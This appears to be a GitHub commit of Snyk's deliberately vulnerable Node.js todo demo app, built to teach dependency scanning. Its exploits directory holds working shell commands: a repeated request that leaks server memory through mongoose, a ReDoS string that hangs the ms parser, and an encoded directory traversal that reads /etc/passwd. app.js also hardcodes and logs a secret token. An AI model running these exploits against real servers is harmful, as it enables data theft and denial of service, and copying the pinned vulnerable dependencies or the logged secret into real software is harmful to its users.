Skip to content

Commit

Permalink
feat: initial commit
Browse files Browse the repository at this point in the history
  • Loading branch information
Danny Grander committed Mar 21, 2016
0 parents commit dd59c14
Show file tree
Hide file tree
Showing 20 changed files with 666 additions and 0 deletions.
8 changes: 8 additions & 0 deletions .gitignore
Original file line number Diff line number Diff line change
@@ -0,0 +1,8 @@
.DS_Store
node_modules
*.sock

.sass-cache
sass
config.rb
npm-debug.log
39 changes: 39 additions & 0 deletions README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,39 @@
## Snyk's vulnerable todo list app
[![Known Vulnerabilities](https://snyk.io/test/github/snyk/snyk-demo-todo/badge.svg?style=flat-square)](https://snyk.io/test/github/snyk/snyk-demo-todo)

A vulnerable Node.js demo application, based on the [Dreamers Lab tutorial](http://dreamerslab.com/blog/en/write-a-todo-list-with-express-and-mongodb/).

### Running
```bash
mongod &

git clone https://github.com/Snyk/snyk-demo-todo
npm install
npm start
```
### Cleanup
To bulk delete the current list of TODO items from the DB run:
```bash
npm run cleanup
```

### Exploiting the vulnerabilities

This app uses npm dependencies holding known vulnerabilities.

Here are the exploitable vulnerable packages:
- [Mongoose - Buffer Memory Exposure](https://snyk.io/vuln/npm:mongoose:20160116)
- [st - Directory Traversal](https://snyk.io/vuln/npm:st:20140206)
- [ms - ReDoS](https://app.snyk.io/vuln/npm:ms:20151024)

The `exploits` directory includes a series of steps to demonstrate each one.

### Fixing the issues
To find these flaws in this application (and in your own apps), run:
```
npm install -g snyk
snyk wizard
```

In this application, the default `snyk wizard` answers will fix all the issues.
When the wizard is done, restart the application and run the exploits again to confirm they are fixed.
56 changes: 56 additions & 0 deletions app.js
Original file line number Diff line number Diff line change
@@ -0,0 +1,56 @@
/**
* Module dependencies.
*/

// mongoose setup
require('./db');

var st = require('st');
var crypto = require('crypto');
var express = require('express');
var http = require('http');
var path = require('path');
var engine = require('ejs-locals');
var cookieParser = require('cookie-parser');
var bodyParser = require('body-parser');
var methodOverride = require('method-override');
var logger = require('morgan');
var errorHandler = require('errorhandler');
var optional = require('optional');

var app = express();
var routes = require('./routes');

// all environments
app.set('port', process.env.PORT || 3001);
app.engine('ejs', engine);
app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'ejs');
app.use(logger('dev'));
app.use(methodOverride());
app.use(cookieParser());
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: false }));

// Routes
app.use(routes.current_user);
app.get('/', routes.index);
app.post('/create', routes.create);
app.get('/destroy/:id', routes.destroy);
app.get('/edit/:id', routes.edit);
app.post('/update/:id', routes.update);

// Static
app.use(st({path: './public', url: '/public'}));

// development only
if (app.get('env') == 'development') {
app.use(errorHandler());
}

var token = 'SECRET_TOKEN_f8ed84e8f41e4146403dd4a6bbcea5e418d23a9';
console.log('token: ' + token);

http.createServer(app).listen(app.get('port'), function() {
console.log('Express server listening on port ' + app.get('port'));
});
10 changes: 10 additions & 0 deletions db.js
Original file line number Diff line number Diff line change
@@ -0,0 +1,10 @@
var mongoose = require('mongoose');
var Schema = mongoose.Schema;

var Todo = new Schema({
content : Buffer,
updated_at : Date
});

mongoose.model('Todo', Todo);
mongoose.connect('mongodb://localhost/express-todo');
30 changes: 30 additions & 0 deletions exploits/mongoose-exploits.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
### Note: these exploits use the httpie command line utility

# start
http http://target:3001/ --headers

# Works as advertised
echo 'content=Buy Beer' | http --form http://target:3001/create -v

# Works with json
echo '{"content":"Fix the bike"}' | http --json http://target:3001/create -v

# Works with number string
echo '{"content":"800"}' | http --json http://target:3001/create -v

# Exploit start - integer
echo '{"content":800}' | http --json http://target:3001/create -v

# Switch to only showing the response body
echo '{"content":800}' | http --json http://target:3001/create -b
echo '{"content":800}' | http --json http://target:3001/create -b | base64 -D

# Repeatedly extract memory
# window 1
repeat 1000 echo '{"content":800}' | http --json http://target:3001/create -b | base64 -D >> leakedmem.bin

# window 2 - see strings in the response
tail -f leakedmem.bin | strings

# window 3 - see a memory dum in the response
tail -f leakedmem.bin | xxd -c 32 -g 32
8 changes: 8 additions & 0 deletions exploits/ms-exploits.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,8 @@
# Working via curl
echo 'content=Call mom in 20 minutes' | http --form http://target:3001/create -v

# Works with long string that matches
echo 'content=Buy milk in '`printf "%.0s5" {1..60000}`' minutes' | http --form http://target:3001/create -v

# Hangs with long string that doesn't match
echo 'content=Buy milk in '`printf "%.0s5" {1..60000}`' minutea' | http --form http://target:3001/create -v
14 changes: 14 additions & 0 deletions exploits/st-exploit.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
# Works as advertised
curl http://localhost:3001/public/about.html

# Directory listing (not necessary)
curl http://localhost:3001/public/

# Failed ../
curl http://localhost:3001/public/../../../

# Exploit start
curl http://localhost:3001/public/%2e%2e/%2e%2e/%2e%2e/

# Exploit full
curl "http://localhost:3001/public/%2e%2e/%2e%2e/%2E%2E/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
31 changes: 31 additions & 0 deletions package.json
Original file line number Diff line number Diff line change
@@ -0,0 +1,31 @@
{
"name": "snyk-todo-list-demo-app",
"version": "0.0.2",
"description": "A vulnerable todo demo application",
"homepage": "https://snyk.io/",
"repository": {
"type": "git",
"url": "https://github.com/Snyk/snyk-todo-list-demo-app/"
},
"scripts": {
"start": "node app.js",
"cleanup": "mongo express-todo --eval 'db.todos.remove({});'"
},
"dependencies": {
"body-parser": "1.9.0",
"cookie-parser": "1.3.3",
"ejs": "1.0.0",
"ejs-locals": "1.0.2",
"errorhandler": "1.2.0",
"express": "4.12.4",
"humanize-ms": "latest",
"method-override": "latest",
"mongoose": "4.2.4",
"morgan": "latest",
"ms": "^0.7.1",
"npmconf": "0.0.24",
"optional": "^0.1.3",
"st": "0.2.4",
"tap": "^5.7.0"
}
}
4 changes: 4 additions & 0 deletions public/about.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,4 @@
<!DOCTYPE html>
<html>
<h1>The BESTest todo app evar</h1>
</html>
Loading

0 comments on commit dd59c14

Please sign in to comment.